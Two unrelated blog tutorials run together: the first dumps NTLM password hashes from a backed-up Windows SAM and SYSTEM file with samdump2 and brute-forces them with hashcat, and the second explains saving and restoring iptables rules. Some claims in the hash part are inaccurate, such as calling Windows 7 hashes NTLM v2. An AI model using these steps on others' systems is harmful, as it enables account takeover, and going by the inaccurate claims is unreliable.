Crack the Windows SAM file from a backup filesystem

The SAM file is locate in C:\Windows\System32\config and stores all Windows account password encrypted.

The problem is that you cannot copy or tamper the file while the file system is mounted.

This leaves us with at least 2 options: copy the SAM and SYTEM files from a Linux live CD or by having a copy of those files in a backup.

I have the backup and I copy the 2 files to my Kali Linux machine.

I recover the NTLM hashes by issuing the following command:

root@kali:~# /usr/bin/samdump2 /root/Desktop/SYSTEM /root/Desktop/SAM
user1:1000:aad3b435b51404eeaad3b435b51404ee:f9a14effe4a24ceb1cf0b2e8e9e7e9f9:::
root@kali:~#

The backup is from a Windows 7 version and that means that we are seeing NTLM v.2 hashes, which translates to the fact that only the last part of the hashes are useful.

So we need to convert to uppercase the bold part by using 2 BASH commands:

cristi@ubserver-nv:~/hashcat$ STRING=’f9a14effe4a24ceb1cf0b2e8e9e7e9f9
cristi@ubserver-nv:~/hashcat$ echo $STRING | awk ‘{print toupper($0)}’
F9A14EFFE4A24CEB1CF0B2E8E9E7E9F9
cristi@ubserver-nv:~/hashcat$

Copy the uppercase version to a text file and start hashcat:

crs@ubsv:~$ ./hashcat -m 1000 -a 3 ./ntlm.txt -w 3 –status

Good luck!

 

 

 

 

 

 

 

 

 

 

 

 

How to save iptables

In this article you will find out how to save iptables firewall rules in Linux CentOS, Redhat, Debian and Ubuntu.

Iptables  is a Linux application built for the purpose of allowing a system administrator to configure and maintain specific firewall tables/rules provided by the Linux kernel firewall module.
There are currently 3 different kernel modules build for the IPv4, IPv6 and ARP stack protocols (iptables is used for IPv4, ip6tables refferes to IPv6, arptables to Addres Resolution Protocol).

The most used and the one used in this tutorial is iptables. In order to execute iptables related commands you need root privileges or to be in the sudoers file in Debian/Ubuntu OSes.

So here’s how to save iptables and how to list existing ones:

The syntax used to check the iptables service status is:

service iptables status  ##CentOS, Redhat
sudo iptables -L -n -v   ##Debian, Ubuntu

 

To start iptables:

service iptables start ##CentOS, Redhat
sudo ufw enable ##Ubuntu

 

To list iptables rules:

iptables -L

 

Save iptables rules:

iptables-save  #Debian
sudo iptables-save  #Ubuntu
service iptables save #CentOS

On CentOS, for example, you would see an output like this:

iptables save

 

 

 

 

To restore iptables rules:

~ # iptables-restore < /etc/sysconfig/iptables
root@nyxware
~ #